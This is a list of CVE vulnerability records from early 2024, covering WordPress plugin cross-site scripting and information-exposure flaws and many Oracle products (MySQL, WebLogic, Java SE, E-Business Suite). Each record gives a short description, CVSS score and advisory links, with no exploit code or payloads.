CVE 2024 2124 Candidate The Translate WordPress and go Multilingual – Weglot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget/block in all versions up to, and including, 4.2.5 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/weglot/trunk/src/actions/class-register-widget-weglot.php#L53 | URL:https://plugins.trac.wordpress.org/browser/weglot/trunk/src/actions/class-register-widget-weglot.php#L53 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve Assigned (20240301)
CVE 2024 2123 Candidate The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L44 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L44 | MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L53 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L53 | MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L65 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L65 | MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L39 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L39 | MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L53 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L53 | MISC:https://plugins.trac.wordpress.org/changeset/3046611/ultimate-member#file746 | URL:https://plugins.trac.wordpress.org/changeset/3046611/ultimate-member#file746 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve Assigned (20240301)
CVE 2024 2107 Candidate The Blossom Spa theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.4 via generated source. This makes it possible for unauthenticated attackers to extract sensitive data including contents of password-protected or scheduled posts. MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=220138%40blossom-spa&new=220138%40blossom-spa&sfp_email=&sfph_mail= | URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=220138%40blossom-spa&new=220138%40blossom-spa&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e54dbf9-a5d1-413d-96ac-93dd499c21a4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e54dbf9-a5d1-413d-96ac-93dd499c21a4?source=cve Assigned (20240301)
CVE 2024 2106 Candidate The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 3.2.10. This can allow unauthenticated attackers to extract sensitive data including all registered user's username and email addresses which can be used to help perform future attacks. MISC:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/classes/models/StmUser.php | URL:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/classes/models/StmUser.php | MISC:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/route.php | URL:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/route.php | MISC:https://plugins.trac.wordpress.org/changeset/3045511/masterstudy-lms-learning-management-system/tags/3.2.11/_core/lms/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system/trunk/_core/lms/route.php | URL:https://plugins.trac.wordpress.org/changeset/3045511/masterstudy-lms-learning-management-system/tags/3.2.11/_core/lms/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system/trunk/_core/lms/route.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve Assigned (20240301)
CVE 2024 20987 Candidate Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20986 Candidate Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20985 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: UDF). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20984 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server : Security : Firewall). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20983 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0009/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20982 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20981 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20980 Candidate Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20979 Candidate Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). Supported versions that are affected are 6.4.0.0.0, 7.0.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20977 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20975 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0007/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20969 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20968 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Options). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20967 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20964 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20963 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20960 Candidate Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: RAPID). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20959 Candidate Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20958 Candidate Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: Engineering Change Order). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20957 Candidate Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Package Build SEC). Supported versions that are affected are Prior to 9.2.8.1. Easily exploitable vulnerability allows high privileged attacker with network access via JDENET to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of JD Edwards EnterpriseOne Tools. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20956 Candidate Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Installation). Supported versions that are affected are Prior to 6.2.4.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Agile Product Lifecycle Management for Process accessible data as well as unauthorized read access to a subset of Oracle Agile Product Lifecycle Management for Process accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Agile Product Lifecycle Management for Process. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20955 Candidate Vulnerability in the Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20953 Candidate Vulnerability in the Oracle Agile PLM product of Oracle Supply Chain (component: Export). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile PLM. Successful attacks of this vulnerability can result in takeover of Oracle Agile PLM. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20952 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3728-1] openjdk-11 security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html Assigned (20231207)
CVE 2024 20951 Candidate Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Customer Interaction History. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Customer Interaction History, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Customer Interaction History accessible data as well as unauthorized read access to a subset of Oracle Customer Interaction History accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20948 Candidate Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Setup, Admin). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20947 Candidate Vulnerability in the Oracle Common Applications product of Oracle E-Business Suite (component: CRM User Management Framework). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Common Applications. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Common Applications, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Common Applications accessible data as well as unauthorized read access to a subset of Oracle Common Applications accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20946 Candidate Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20945 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20944 Candidate Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle iSupport. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iSupport, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iSupport accessible data as well as unauthorized read access to a subset of Oracle iSupport accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20943 Candidate Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20942 Candidate Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: LOV). Supported versions that are affected are 11.5, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized read access to a subset of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
